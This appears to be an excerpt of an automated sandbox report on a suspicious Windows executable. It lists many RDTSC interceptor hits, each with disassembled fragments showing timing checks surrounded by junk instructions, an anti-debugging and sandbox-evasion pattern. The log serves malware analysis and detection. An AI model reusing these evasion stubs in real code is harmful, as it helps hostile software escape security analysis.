                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C362BA second address: C362C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C404E5 second address: C40512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB7h 0x00000007 jmp 00007F1BB4D69EACh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C4069C second address: C406BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F536h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C406BB second address: C406C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40983 second address: C40995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F1BB4E5F52Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40995 second address: C409C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1BB4D69EB8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F1BB4D69EA6h 0x00000015 popad 0x00000016 jp 00007F1BB4D69EACh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40B12 second address: C40B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40B16 second address: C40B45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F1BB4D69EAAh 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push edx 0x00000010 jnp 00007F1BB4D69EA6h 0x00000016 pop edx 0x00000017 jns 00007F1BB4D69EAEh 0x0000001d pushad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40B45 second address: C40B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C4109B second address: C410B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnl 00007F1BB4D69EA6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C410B3 second address: C410C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C41337 second address: C4133D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C41A2A second address: C41A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C41A2E second address: C41A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C41A34 second address: C41A3B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C3FFFE second address: C40003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40003 second address: C40034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BB4E5F52Fh 0x00000008 jnp 00007F1BB4E5F526h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F1BB4E5F526h 0x00000017 jmp 00007F1BB4E5F530h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40034 second address: C40048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jo 00007F1BB4D69EA6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40048 second address: C40051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C40051 second address: C40071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4D69EADh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F1BB4D69EABh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C47B39 second address: C47B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C4ACD0 second address: C4ACDA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1BB4D69EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C4A75A second address: C4A760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C57762 second address: C5776D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C578BE second address: C578C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C73F53 second address: C73F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4D69EB2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C73F69 second address: C73F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C73F6D second address: C73F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F1BB4D69EA6h 0x0000000d jns 00007F1BB4D69EA6h 0x00000013 popad 0x00000014 pop esi 0x00000015 jne 00007F1BB4D69EBCh 0x0000001b pushad 0x0000001c jmp 00007F1BB4D69EACh 0x00000021 push edx 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C74F26 second address: C74F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BB4E5F52Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C7A317 second address: C7A31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C7A31B second address: C7A34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F533h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1BB4E5F534h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C85097 second address: C8509B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C8509B second address: C850A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C850A1 second address: C850D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BB4D69EAFh 0x0000000b pushad 0x0000000c jmp 00007F1BB4D69EB7h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C84EE1 second address: C84EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4E5F531h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C84EF6 second address: C84EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C84EFA second address: C84F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F537h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C84F1B second address: C84F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1BB4D69EA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C8805A second address: C88076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F1BB4E5F52Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F1BB4E5F526h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C88076 second address: C8807A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C82A9A second address: C82AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F1BB4E5F536h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98975 second address: C98982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1BB4D69EB2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98982 second address: C9898C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1BB4E5F526h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C9898C second address: C98994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C984D0 second address: C98509 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BB4E5F538h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1BB4E5F536h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98509 second address: C98534 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1BB4D69EB0h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98534 second address: C98538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98538 second address: C98540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98692 second address: C98696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98696 second address: C9869C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C9869C second address: C986DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F1BB4E5F52Ch 0x0000000c jno 00007F1BB4E5F526h 0x00000012 push ecx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jns 00007F1BB4E5F526h 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push esi 0x00000021 pop esi 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 pushad 0x00000026 push edi 0x00000027 pop edi 0x00000028 jmp 00007F1BB4E5F535h 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C986DA second address: C986E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C986E0 second address: C986E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C986E6 second address: C986EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CAC674 second address: CAC67A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CAC67A second address: CAC67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CAC803 second address: CAC80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CAC80B second address: CAC827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4D69EB7h 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CAC827 second address: CAC82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CAC99E second address: CAC9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CACF8D second address: CACF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CACF93 second address: CACFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4D69EACh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F1BB4D69EB7h 0x00000010 jmp 00007F1BB4D69EACh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CAD258 second address: CAD263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CAD3C4 second address: CAD3C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CB1831 second address: CB1835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CB1835 second address: CB184F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CB184F second address: CB1855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CB1855 second address: CB1859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CB2FE1 second address: CB302A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F1BB4E5F534h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jne 00007F1BB4E5F526h 0x00000012 jmp 00007F1BB4E5F52Ah 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jmp 00007F1BB4E5F52Bh 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 je 00007F1BB4E5F528h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CB302A second address: CB302E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CB302E second address: CB3034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CB3034 second address: CB3049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EB1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CB3049 second address: CB304D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: CB4DE1 second address: CB4E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1BB4D69EB7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F1BB4D69EB2h 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1BB4D69EB2h 0x00000019 jmp 00007F1BB4D69EB8h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD1231 second address: BD1235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BD13D1 second address: BD13DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F1BB4D69EA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E703DC second address: 4E703EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4E5F52Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E703EE second address: 4E70403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1BB4D69EAAh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E70403 second address: 4E70426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c jmp 00007F1BB4E5F52Fh 0x00000011 mov edx, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E70426 second address: 4E7044C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, C74Dh 0x0000000a popad 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov si, 9305h 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007F1BB4D69EB0h 0x0000001a pop ecx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E7048D second address: 4E70491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E905A7 second address: 4E905CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1BB4D69EB2h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E905CA second address: 4E905CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E905CE second address: 4E905D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E905D4 second address: 4E90658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1BB4E5F536h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov ecx, 641B982Dh 0x00000017 pushfd 0x00000018 jmp 00007F1BB4E5F52Ah 0x0000001d sub ax, 60C8h 0x00000022 jmp 00007F1BB4E5F52Bh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ecx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1BB4E5F534h 0x00000031 and si, E328h 0x00000036 jmp 00007F1BB4E5F52Bh 0x0000003b popfd 0x0000003c mov di, si 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov edx, esi 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90658 second address: 4E906F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F1BB4D69EAEh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov bl, ah 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F1BB4D69EB9h 0x0000001a xor eax, 5EDC1E06h 0x00000020 jmp 00007F1BB4D69EB1h 0x00000025 popfd 0x00000026 movzx ecx, di 0x00000029 popad 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov eax, 306464AFh 0x00000032 mov dx, cx 0x00000035 popad 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 push esi 0x00000039 mov cx, dx 0x0000003c pop edx 0x0000003d mov di, cx 0x00000040 popad 0x00000041 lea eax, dword ptr [ebp-04h] 0x00000044 jmp 00007F1BB4D69EAEh 0x00000049 nop 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f mov edx, 7922A29Eh 0x00000054 popad 0x00000055 rdtsc
